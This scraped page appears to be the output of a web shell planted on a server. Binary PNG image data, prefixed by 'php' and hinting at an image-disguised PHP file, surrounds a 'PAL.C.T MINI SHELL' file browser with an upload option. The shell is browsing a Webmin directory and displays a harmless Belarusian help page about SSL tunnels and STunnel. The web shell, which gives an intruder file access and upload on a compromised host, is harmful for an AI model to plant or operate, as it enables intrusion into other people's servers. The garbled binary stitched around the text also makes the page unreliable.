php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.be.auto.html

<header> Уводзіны ў тунэлі SSL </header> SSL - гэта пратакол для шыфравання дадзеных у злучэнні TCP, калі ён праходзіць па сетцы. Першапачаткова ён быў распрацаваны для абароны трафіку паміж вэб-браўзарамі і серверамі, але можа быць выкарыстаны для шыфравання любых відаў патоку дадзеных, якія звычайна адпраўляюцца праз пратакол TCP. <p> Пратакол SSL дазваляе кліентам і серверам аўтэнтыфікаваць сябе адзін з адным, так што кліент можа быць упэўнены, што ён сапраўды злучаецца з хостам, якога ён лічыць. Гэта робіцца пры дапамозе сертыфікатаў, якія выдаюцца пацверджаным кліентам сертыфікатам (каб яны маглі быць правераны) і звязаны з пэўным імем хаста. Без сертыфікатаў зламыснік можа перанакіраваць злучэнне SSL на ўласны сервер і захапіць сакрэтную інфармацыю ад кліента, які лічыць, што ён размаўляе з сапраўдным серверам. <p> Любыя дадзеныя, якія падарожнічаюць па Інтэрнэце ў незашыфраваным выглядзе, могуць злавіць і прачытаць зламыснік з доступам да адной з сетак, праз якую ён праходзіць. Нават дадзеныя, якія перамяшчаюцца паміж кліентам і сервернай сістэмай па лакальнай сетцы, можна лёгка слухаць. Пры падключэнні да сервера telnet, FTP або POP3 ваш пароль адпраўляецца па сетцы і, такім чынам, зламыснік можа быць захоплены. <p> SSL можа выкарыстоўвацца для абароны дадзеных у падобных сітуацыях, але толькі калі кліент і сервер падтрымліваюць іх. Большасць вэб-браўзэраў і паштовых кліентаў могуць злучаць зашыфраваныя SSL злучэнні HTTP, POP3 і IMAP, але не ўсе вэб-і POP3-серверы могуць іх прымаць. У прыватнасці, POP3 цяжка абараніць, таму што стандартны сервер, які пастаўляецца з большасцю сістэм Unix, наогул не падтрымлівае SSL. На шчасце, хоць ёсць рашэнне - STunnel. <p> STunnel - гэта простая праграма, якая пераўтварае незашыфраванае злучэнне ў зашыфраванае SSL. Звычайна ён усталёўваецца для запуску з супер-сервера, напрыклад, inetd або xinetd, а затым запусціць нейкую іншую праграму, напрыклад сервер POP3, які не падтрымлівае SSL. Гэтая канструкцыя дазваляе абараняць любы сервер, які звычайна працуе ад inetd, напрыклад, серверы telnet, NNTP і IMAP. <p> Не ўсе серверы могуць быць карысна абаронены шыфраваннем, паколькі не існуе кліента, каб выкарыстоўваць іх у рэжыме SSL. Напрыклад, я ніколі не чуў пра кліента telnet або FTP, які можа выкарыстоўваць SSL, таму што звычайны пакет SSH ужо дазваляе зашыфраваныя выдаленыя ўваходы і перадачы файлаў. <p> Гэты модуль Webmin дазваляе лёгка наладзіць сэрвісы суперсервера, якія запусцяць STunnel, каб запусціць нейкую серверную праграму. Нягледзячы на тое, што гэта можна зрабіць уручную з дапамогай модуля Інтэрнэт-паслугі, гэты спецыяльна распрацаваны для налады і налады STunnel. Ён аўтаматычна вызначае, калі ў вас усталяваны inetd і / або xinetd, счытвае іх канфігурацыі для праверкі наяўнасці тунэляў SSL і дадае да іх пры стварэнні новага тунэля. Калі абодва ўстаноўлены, у канфігурацыю xinetd дадаюцца новыя тунэлі SSL, паколькі ён, па-мойму, пераўзыходзіць два. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`